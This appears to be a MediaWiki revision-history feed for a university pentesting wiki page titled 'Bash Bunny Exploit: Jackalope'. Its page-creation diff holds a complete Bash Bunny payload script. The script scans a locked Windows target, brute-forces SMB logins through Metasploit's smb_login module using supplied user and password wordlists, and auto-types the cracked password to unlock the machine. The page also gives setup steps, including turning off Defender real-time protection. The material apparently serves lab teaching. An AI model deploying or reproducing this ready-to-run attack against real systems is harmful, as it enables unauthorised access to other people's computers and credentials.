<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
	<id>https://elvis.hcw.ac.at/wiki/index.php?action=history&amp;feed=atom&amp;title=Bash_Bunny_Exploit%3A_Jackalope</id>
	<title>Bash Bunny Exploit: Jackalope - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://elvis.hcw.ac.at/wiki/index.php?action=history&amp;feed=atom&amp;title=Bash_Bunny_Exploit%3A_Jackalope"/>
	<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Bash_Bunny_Exploit:_Jackalope&amp;action=history"/>
	<updated>2026-09-09T16:52:54Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.41.5</generator>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Bash_Bunny_Exploit:_Jackalope&amp;diff=16434&amp;oldid=prev</id>
		<title>NKirnbauer: NKirnbauer moved page Bashbunny exploit - Jackalope to Bash Bunny Exploit: Jackalope</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Bash_Bunny_Exploit:_Jackalope&amp;diff=16434&amp;oldid=prev"/>
		<updated>2024-10-23T10:01:46Z</updated>

		<summary type="html">&lt;p&gt;NKirnbauer moved page &lt;a href=&quot;/wiki/index.php/Bashbunny_exploit_-_Jackalope&quot; class=&quot;mw-redirect&quot; title=&quot;Bashbunny exploit - Jackalope&quot;&gt;Bashbunny exploit - Jackalope&lt;/a&gt; to &lt;a href=&quot;/wiki/index.php/Bash_Bunny_Exploit:_Jackalope&quot; title=&quot;Bash Bunny Exploit: Jackalope&quot;&gt;Bash Bunny Exploit: Jackalope&lt;/a&gt;&lt;/p&gt;
&lt;table style=&quot;background-color: #fff; color: #202122;&quot; data-mw=&quot;interface&quot;&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;tr class=&quot;diff-title&quot; lang=&quot;en&quot;&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;← Older revision&lt;/td&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;Revision as of 10:01, 23 October 2024&lt;/td&gt;
				&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;4&quot; class=&quot;diff-notice&quot; lang=&quot;en&quot;&gt;&lt;div class=&quot;mw-diff-empty&quot;&gt;(No difference)&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;!-- diff cache key mediawiki:diff:1.41:old-14616:rev-16434 --&gt;
&lt;/table&gt;</summary>
		<author><name>NKirnbauer</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Bash_Bunny_Exploit:_Jackalope&amp;diff=14616&amp;oldid=prev</id>
		<title>Ikramer at 17:32, 12 March 2024</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Bash_Bunny_Exploit:_Jackalope&amp;diff=14616&amp;oldid=prev"/>
		<updated>2024-03-12T17:32:53Z</updated>

		<summary type="html">&lt;p&gt;&lt;/p&gt;
&lt;table style=&quot;background-color: #fff; color: #202122;&quot; data-mw=&quot;interface&quot;&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;tr class=&quot;diff-title&quot; lang=&quot;en&quot;&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;← Older revision&lt;/td&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;Revision as of 17:32, 12 March 2024&lt;/td&gt;
				&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot; id=&quot;mw-diff-left-l280&quot;&gt;Line 280:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Line 280:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;* https://wiki.bashbunny.com/#!index.md#Tools&lt;/div&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;* https://wiki.bashbunny.com/#!index.md#Tools&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;* https://docs.hak5.org/bash-bunny/writing-payloads/led&lt;/div&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;* https://docs.hak5.org/bash-bunny/writing-payloads/led&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-side-deleted&quot;&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot; data-marker=&quot;+&quot;&gt;&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-side-deleted&quot;&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot; data-marker=&quot;+&quot;&gt;&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-side-deleted&quot;&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot; data-marker=&quot;+&quot;&gt;&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;[[Category:Documentation]]&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-side-deleted&quot;&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot; data-marker=&quot;+&quot;&gt;&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;[[Category:Pentesting]]&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;

&lt;!-- diff cache key mediawiki:diff:1.41:old-10209:rev-14616:php=table --&gt;
&lt;/table&gt;</summary>
		<author><name>Ikramer</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Bash_Bunny_Exploit:_Jackalope&amp;diff=10209&amp;oldid=prev</id>
		<title>EPelanovic at 17:33, 28 June 2022</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Bash_Bunny_Exploit:_Jackalope&amp;diff=10209&amp;oldid=prev"/>
		<updated>2022-06-28T17:33:50Z</updated>

		<summary type="html">&lt;p&gt;&lt;/p&gt;
&lt;table style=&quot;background-color: #fff; color: #202122;&quot; data-mw=&quot;interface&quot;&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;tr class=&quot;diff-title&quot; lang=&quot;en&quot;&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;← Older revision&lt;/td&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;Revision as of 17:33, 28 June 2022&lt;/td&gt;
				&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot; id=&quot;mw-diff-left-l48&quot;&gt;Line 48:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Line 48:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;=== LED Status ===&lt;/div&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;=== LED Status ===&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;br&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;diff-marker&quot; data-marker=&quot;−&quot;&gt;&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;[File:BashBunny_status.PNG|thumb|none|500px|LED Status lights]&lt;/div&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot; data-marker=&quot;+&quot;&gt;&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;[&lt;/ins&gt;[File:BashBunny_status.PNG|thumb|none|500px|LED Status lights&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;]&lt;/ins&gt;]&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;br&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;A detailed description oft these LED states can be found [https://docs.hak5.org/bash-bunny/writing-payloads/led here].&lt;/div&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;A detailed description oft these LED states can be found [https://docs.hak5.org/bash-bunny/writing-payloads/led here].&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;

&lt;!-- diff cache key mediawiki:diff:1.41:old-10208:rev-10209:php=table --&gt;
&lt;/table&gt;</summary>
		<author><name>EPelanovic</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Bash_Bunny_Exploit:_Jackalope&amp;diff=10208&amp;oldid=prev</id>
		<title>EPelanovic: Created page with &quot;== Summary ==   Uses ethernet to attempt dictionary attacks against passwords. When the password is discovered, it is stored in a file for future use. The password may be used to unlock the machine by:  * Manually select user &amp; place focus on the password field at the login screen * Toggle the switch position from switch1 to switch2 (or vice versa) &amp; the bunny will auto-type the stored password.  To clear a stored password, move the switch to switch3 (aka arming mode) af...&quot;</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Bash_Bunny_Exploit:_Jackalope&amp;diff=10208&amp;oldid=prev"/>
		<updated>2022-06-28T17:30:10Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;== Summary ==   Uses ethernet to attempt dictionary attacks against passwords. When the password is discovered, it is stored in a file for future use. The password may be used to unlock the machine by:  * Manually select user &amp;amp; place focus on the password field at the login screen * Toggle the switch position from switch1 to switch2 (or vice versa) &amp;amp; the bunny will auto-type the stored password.  To clear a stored password, move the switch to switch3 (aka arming mode) af...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Uses ethernet to attempt dictionary attacks against passwords. When the password is discovered, it is stored in a file for future use. The password may be used to unlock the machine by:&lt;br /&gt;
&lt;br /&gt;
* Manually select user &amp;amp; place focus on the password field at the login screen&lt;br /&gt;
* Toggle the switch position from switch1 to switch2 (or vice versa) &amp;amp; the bunny will auto-type the stored password.&lt;br /&gt;
&lt;br /&gt;
To clear a stored password, move the switch to switch3 (aka arming mode) after the payload runs and displays GREEN. The status light will change to SPECIAL (cyan) indicating the password has been removed. Positioning the switch to switch1 or switch2 will re-initiate the attack.&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
=== Required Tools ===&lt;br /&gt;
&lt;br /&gt;
You must have a Metasploit installation up and running in path /tools/metasploit-framework/&lt;br /&gt;
For the installation of additional tools to the Bash Bunny follow this link [https://forums.hak5.org/topic/40971-info-tools/ here] or download the tools you need by clicking on following links:&lt;br /&gt;
&lt;br /&gt;
* [https://storage.googleapis.com/bashbunny_tools/impacket-bunny.deb Impacket]&lt;br /&gt;
* [https://storage.googleapis.com/bashbunny_tools/responder-bunny.deb Responder]&lt;br /&gt;
* [https://storage.googleapis.com/bashbunny_tools/gohttp-bunny.deb Gohttp]&lt;br /&gt;
* [https://storage.googleapis.com/bashbunny_tools/metasploit-bunny.deb Metasploit-Framework] (Requires firmware 1.6 or above)&lt;br /&gt;
&lt;br /&gt;
By clicking on the links, a download will be started automatically. &lt;br /&gt;
Move the downloaded files in BashBunnys “loot” folder. Then unplug the device safely and plug it in again. The device will take some time to move the files to Linux (purple LED flashing). Wait until the LED is flashing in blue again.&lt;br /&gt;
No further initial configuration is required for Firmware v1.6+.&lt;br /&gt;
&lt;br /&gt;
=== Windows Defender ===&lt;br /&gt;
&lt;br /&gt;
When using a Windows machine, Windows Defender will complain and therefore block a lot of files and executions. You therefore have to unable the Real-time detection for your device to have Bash Bunny work properly. &lt;br /&gt;
&lt;br /&gt;
Follow these steps to temporarily turn off real-time Microsoft Defender antivirus protection in Windows Security. However, keep in mind that if you do, your device may be vulnerable to threats.&lt;br /&gt;
&lt;br /&gt;
&amp;amp;emsp;1. Select Start and type &amp;quot;Windows Security&amp;quot; to search for that app.&lt;br /&gt;
&lt;br /&gt;
&amp;amp;emsp;2. Select the Windows Security app from the search results, go to Virus &amp;amp; threat protection, and under Virus &amp;amp; threat protection settings select Manage settings.&lt;br /&gt;
&lt;br /&gt;
&amp;amp;emsp;3. Switch Real-time protection to Off. Note that scheduled scans will continue to run. However, files that are downloaded or installed will not be scanned until the next scheduled scan.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Per attack configuration ===&lt;br /&gt;
&lt;br /&gt;
* userlist.txt contains usernames to use in attack.&lt;br /&gt;
* wordlist.txt contains passwords to use in attack.&lt;br /&gt;
&lt;br /&gt;
Note: A fantastic collection of password wordlists are available: [https://github.com/danielmiessler/SecLists SecLists]&lt;br /&gt;
&lt;br /&gt;
=== LED Status ===&lt;br /&gt;
&lt;br /&gt;
[File:BashBunny_status.PNG|thumb|none|500px|LED Status lights]&lt;br /&gt;
&lt;br /&gt;
A detailed description oft these LED states can be found [https://docs.hak5.org/bash-bunny/writing-payloads/led here].&lt;br /&gt;
&lt;br /&gt;
=== Payload ===&lt;br /&gt;
&lt;br /&gt;
This payload uses Metasploit for the exploit. Therefore, as already mentioned above, the Metasploit-Framework is needed. The framework uses the &amp;#039;&amp;#039;&amp;#039;auxiliary/scanner/smb/smb_login&amp;#039;&amp;#039;&amp;#039; module for the exploit. &lt;br /&gt;
&lt;br /&gt;
=== Exploit overview === &lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Name:&amp;#039;&amp;#039;&amp;#039; SMB Login Check Scanner&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Module:&amp;#039;&amp;#039;&amp;#039; auxiliary/scanner/smb/smb_login&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Source code:&amp;#039;&amp;#039;&amp;#039; modules/auxiliary/scanner/smb/smb_login.rb&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Disclosure date:&amp;#039;&amp;#039;&amp;#039; -&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Last modification time:&amp;#039;&amp;#039;&amp;#039; 2021-08-31 17:10:07 +0000&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Supported architecture(s):&amp;#039;&amp;#039;&amp;#039; -&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Supported platform(s):&amp;#039;&amp;#039;&amp;#039; -&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Target service / protocol:&amp;#039;&amp;#039;&amp;#039; microsoft-ds, netbios-ssn&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Target network port(s):&amp;#039;&amp;#039;&amp;#039; 139, 445&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;List of CVEs:&amp;#039;&amp;#039;&amp;#039; CVE-1999-0506&lt;br /&gt;
&lt;br /&gt;
This module will test a SMB login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.&lt;br /&gt;
&lt;br /&gt;
Therefore, the firewall of the target PC needs to have port 445 (inbound traffic) opened. &lt;br /&gt;
&lt;br /&gt;
=== How do you enable port 445? ===&lt;br /&gt;
&lt;br /&gt;
Go Start &amp;gt; Control Panel &amp;gt; Windows Firewall and find Advanced settings on the left side. 2. Click Inbound Rules &amp;gt; New rule. Then in the pop-up window, choose Port &amp;gt; Next &amp;gt;TCP &amp;gt; Specific local ports and type 445 and go Next. Create the rule.&lt;br /&gt;
&lt;br /&gt;
Otherwise, you “network inaccessible” error, illustrate by a blinking red LED at the Bash Bunny.&lt;br /&gt;
&lt;br /&gt;
== Payload Preperation ==&lt;br /&gt;
&lt;br /&gt;
=== payload.txt ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#!/bin/bash&lt;br /&gt;
#&lt;br /&gt;
# Title: Jackalope&lt;br /&gt;
# Author: catatonic&lt;br /&gt;
# Version: 1.1.0&lt;br /&gt;
&lt;br /&gt;
# Check readiness &amp;amp; prepare environment&lt;br /&gt;
LED SETUP&lt;br /&gt;
&lt;br /&gt;
REQUIRETOOL metasploit-framework&lt;br /&gt;
ATTACKMODE HID RNDIS_ETHERNET&lt;br /&gt;
&lt;br /&gt;
# Ensure loot is available for recording results.&lt;br /&gt;
mount /dev/nandf /root/udisk/&lt;br /&gt;
&lt;br /&gt;
ORIGINAL_SWITCH=$SWITCH_POSITION&lt;br /&gt;
PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION&lt;br /&gt;
LOOTBASE=/root/udisk/loot/Jackalope/&lt;br /&gt;
&lt;br /&gt;
# SETUP&lt;br /&gt;
GET TARGET_IP&lt;br /&gt;
GET TARGET_HOSTNAME&lt;br /&gt;
&lt;br /&gt;
COUNT=$(ls -lad $LOOTBASE/$TARGET_HOSTNAME* | wc -l)&lt;br /&gt;
COUNT=$((COUNT+1))&lt;br /&gt;
LOOTDIR=$LOOTBASE/$TARGET_HOSTNAME-$COUNT&lt;br /&gt;
mkdir -p $LOOTDIR&lt;br /&gt;
&lt;br /&gt;
MSF_DIR=/tools/metasploit-framework&lt;br /&gt;
&lt;br /&gt;
# Save environment informaiton:&lt;br /&gt;
echo &amp;quot;PAYLOAD_DIR: $PAYLOAD_DIR&amp;quot; &amp;gt;&amp;gt; $LOOTDIR/log.txt&lt;br /&gt;
echo &amp;quot;MSF_DIR: $MSF_DIR&amp;quot; &amp;gt;&amp;gt; $LOOTDIR/log.txt&lt;br /&gt;
echo &amp;quot;LOOTDIR: $LOOTDIR&amp;quot; &amp;gt;&amp;gt; $LOOTDIR/log.txt&lt;br /&gt;
echo &amp;quot;TARGET_IP: $TARGET_IP&amp;quot; &amp;gt;&amp;gt; $LOOTDIR/log.txt&lt;br /&gt;
echo &amp;quot;TARGET_HOSTNAME: $TARGET_HOSTNAME&amp;quot; &amp;gt;&amp;gt; $LOOTDIR/log.txt&lt;br /&gt;
&lt;br /&gt;
SYNC ()&lt;br /&gt;
{&lt;br /&gt;
	sync; sleep 1; sync&lt;br /&gt;
}&lt;br /&gt;
CLEAR_PW()&lt;br /&gt;
{&lt;br /&gt;
	LED SPECIAL&lt;br /&gt;
	rm $PAYLOAD_DIR/quack_pass.txt&lt;br /&gt;
	SYNC&lt;br /&gt;
	WAIT&lt;br /&gt;
}&lt;br /&gt;
ENTER_PW()&lt;br /&gt;
{&lt;br /&gt;
	sleep 1&lt;br /&gt;
	QUACK $ORIGINAL_SWITCH/quack_pass.txt&lt;br /&gt;
	QUACK ENTER&lt;br /&gt;
}&lt;br /&gt;
RECON()&lt;br /&gt;
{&lt;br /&gt;
	ATTACKMODE RNDIS_ETHERNET&lt;br /&gt;
	# Stage 1: Recon&lt;br /&gt;
	LED STAGE1&lt;br /&gt;
	echo &amp;quot;Executing nmap...&amp;quot; &amp;gt;&amp;gt; $LOOTDIR/log.txt&lt;br /&gt;
	nmap -p 445 -Pn $TARGET_IP &amp;gt; $LOOTDIR/nmap_results.txt&lt;br /&gt;
	if ! grep --quiet &amp;quot;445.*open&amp;quot; $LOOTDIR/nmap_results.txt;&lt;br /&gt;
	then&lt;br /&gt;
		LED FAIL2&lt;br /&gt;
		SYNC&lt;br /&gt;
		exit&lt;br /&gt;
	fi&lt;br /&gt;
}&lt;br /&gt;
EXPLOIT()&lt;br /&gt;
{&lt;br /&gt;
	# Stage 2: Exploit&lt;br /&gt;
	LED STAGE2&lt;br /&gt;
	export HOME=/root&lt;br /&gt;
	cd $MSF_DIR&lt;br /&gt;
	./msfconsole -q -x &amp;quot;use auxiliary/scanner/smb/smb_login; set RHOSTS $TARGET_IP; set USER_FILE $PAYLOAD_DIR/userlist.txt; set PASS_FILE $PAYLOAD_DIR/wordlist.txt; run; exit&amp;quot; &amp;gt; $LOOTDIR/msfconsole.txt&lt;br /&gt;
&lt;br /&gt;
	if ! grep --quiet &amp;quot;^\[+\]&amp;quot; $LOOTDIR/msfconsole.txt;&lt;br /&gt;
	then&lt;br /&gt;
		LED FAIL&lt;br /&gt;
		echo &amp;quot;Payload failed, no logins found...&amp;quot; &amp;gt;&amp;gt; $LOOTDIR/log.txt&lt;br /&gt;
		SYNC&lt;br /&gt;
		exit&lt;br /&gt;
	fi&lt;br /&gt;
&lt;br /&gt;
	grep &amp;quot;^\[+\]&amp;quot; $LOOTDIR/msfconsole.txt  | grep -o \&amp;#039;.*\&amp;#039; | cut -d &amp;#039;:&amp;#039; -f 1 | cut -d &amp;quot;&amp;#039;&amp;quot; -f 2 &amp;gt; $LOOTDIR/user.txt&lt;br /&gt;
	grep &amp;quot;^\[+\]&amp;quot; $LOOTDIR/msfconsole.txt  | grep -o \&amp;#039;.*\&amp;#039; | cut -d &amp;#039;:&amp;#039; -f 2 | cut -d &amp;quot;&amp;#039;&amp;quot; -f 1 &amp;gt; $LOOTDIR/password.txt&lt;br /&gt;
&lt;br /&gt;
	# Focus needs to be set on the password field manually.&lt;br /&gt;
	echo -n &amp;quot;STRING &amp;quot; &amp;gt; $PAYLOAD_DIR/quack_pass.txt&lt;br /&gt;
	cat $LOOTDIR/password.txt &amp;gt;&amp;gt; $PAYLOAD_DIR/quack_pass.txt&lt;br /&gt;
&lt;br /&gt;
	SYNC&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
# High level view.&lt;br /&gt;
while true&lt;br /&gt;
do&lt;br /&gt;
	if [ -f $PAYLOAD_DIR/quack_pass.txt ];&lt;br /&gt;
	then&lt;br /&gt;
		LED FINISH&lt;br /&gt;
	else&lt;br /&gt;
		RECON&lt;br /&gt;
		EXPLOIT&lt;br /&gt;
		continue&lt;br /&gt;
	fi&lt;br /&gt;
&lt;br /&gt;
	WAIT&lt;br /&gt;
&lt;br /&gt;
	# User&amp;#039;s choice, clear old password or enter password.&lt;br /&gt;
	if [ &amp;quot;$SWITCH_POSITION&amp;quot; == &amp;quot;switch3&amp;quot; ];&lt;br /&gt;
	then&lt;br /&gt;
		CLEAR_PW&lt;br /&gt;
	else&lt;br /&gt;
		ENTER_PW&lt;br /&gt;
	fi&lt;br /&gt;
done&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== userlist.txt === &lt;br /&gt;
&lt;br /&gt;
Add here the usernames you want to attack on the target host, like for example:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Administrator&lt;br /&gt;
Willi&lt;br /&gt;
Gast&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== wordlist.txt === &lt;br /&gt;
&lt;br /&gt;
Add here the some common used passwords, which will be used to bruteforce the target host. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;123456&lt;br /&gt;
password&lt;br /&gt;
12345678&lt;br /&gt;
qwerty&lt;br /&gt;
123456789&lt;br /&gt;
12345&lt;br /&gt;
1234&lt;br /&gt;
111111&lt;br /&gt;
1234567&lt;br /&gt;
dragon&lt;br /&gt;
123123&lt;br /&gt;
baseball&lt;br /&gt;
abc123&lt;br /&gt;
football&lt;br /&gt;
monkey&lt;br /&gt;
letmein&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Execution ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;emsp;1. Plug the configured Bash Bunny in the Windows target machine. The target machine’s screen should be locked, and the Bash Bunny’s button should be placed also correctly, depending on which switch you configured the payload (switch1 or switch2).&lt;br /&gt;
&lt;br /&gt;
&amp;amp;emsp;2. Bash Bunny’s LED lights purple until the execution of the payload. &lt;br /&gt;
&lt;br /&gt;
